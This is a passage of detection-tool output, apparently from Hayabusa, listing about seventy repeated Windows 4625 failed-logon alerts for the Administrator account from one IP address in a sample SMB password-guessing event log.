| 935 | 2016-09-20 01:50:18.743 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 936 | 2016-09-20 01:50:18.776 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 937 | 2016-09-20 01:50:18.808 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 938 | 2016-09-20 01:50:18.847 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 939 | 2016-09-20 01:50:18.888 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 940 | 2016-09-20 01:50:18.920 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 941 | 2016-09-20 01:50:18.959 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 942 | 2016-09-20 01:50:18.999 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 943 | 2016-09-20 01:50:19.043 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 944 | 2016-09-20 01:50:19.085 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 945 | 2016-09-20 01:50:19.127 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 946 | 2016-09-20 01:50:19.167 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 947 | 2016-09-20 01:50:19.217 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 948 | 2016-09-20 01:50:19.261 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 949 | 2016-09-20 01:50:19.300 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 950 | 2016-09-20 01:50:19.350 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 951 | 2016-09-20 01:50:19.388 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 952 | 2016-09-20 01:50:19.432 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 953 | 2016-09-20 01:50:19.539 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 954 | 2016-09-20 01:50:19.602 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 955 | 2016-09-20 01:50:19.670 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 956 | 2016-09-20 01:50:19.720 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 957 | 2016-09-20 01:50:19.759 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 958 | 2016-09-20 01:50:19.801 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 959 | 2016-09-20 01:50:19.837 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 960 | 2016-09-20 01:50:19.875 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 961 | 2016-09-20 01:50:19.921 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 962 | 2016-09-20 01:50:19.965 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 963 | 2016-09-20 01:50:20.008 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 964 | 2016-09-20 01:50:20.039 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 965 | 2016-09-20 01:50:20.091 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 966 | 2016-09-20 01:50:20.132 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 967 | 2016-09-20 01:50:20.173 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 968 | 2016-09-20 01:50:20.215 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 969 | 2016-09-20 01:50:20.252 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 970 | 2016-09-20 01:50:20.288 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 971 | 2016-09-20 01:50:20.326 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 972 | 2016-09-20 01:50:20.363 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 973 | 2016-09-20 01:50:20.417 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 974 | 2016-09-20 01:50:20.462 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 975 | 2016-09-20 01:50:20.501 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 976 | 2016-09-20 01:50:20.543 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 977 | 2016-09-20 01:50:20.580 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 978 | 2016-09-20 01:50:20.619 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 979 | 2016-09-20 01:50:20.657 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 980 | 2016-09-20 01:50:20.707 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 981 | 2016-09-20 01:50:20.791 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 982 | 2016-09-20 01:50:20.840 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 983 | 2016-09-20 01:50:20.879 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 984 | 2016-09-20 01:50:20.911 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 985 | 2016-09-20 01:50:20.964 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 986 | 2016-09-20 01:50:21.021 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 987 | 2016-09-20 01:50:21.072 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 988 | 2016-09-20 01:50:21.103 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 989 | 2016-09-20 01:50:21.140 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 990 | 2016-09-20 01:50:21.187 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 991 | 2016-09-20 01:50:21.226 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 992 | 2016-09-20 01:50:21.265 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 993 | 2016-09-20 01:50:21.302 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 994 | 2016-09-20 01:50:21.344 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 995 | 2016-09-20 01:50:21.387 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 996 | 2016-09-20 01:50:21.422 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 997 | 2016-09-20 01:50:21.465 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 998 | 2016-09-20 01:50:21.505 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 999 | 2016-09-20 01:50:21.540 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1000 | 2016-09-20 01:50:21.584 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1001 | 2016-09-20 01:50:21.624 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1002 | 2016-09-20 01:50:21.668 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1003 | 2016-09-20 01:50:21.712 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1004 | 2016-09-20 01:50:21.745 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1005 | 2016-09-20 01:50:21.792 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
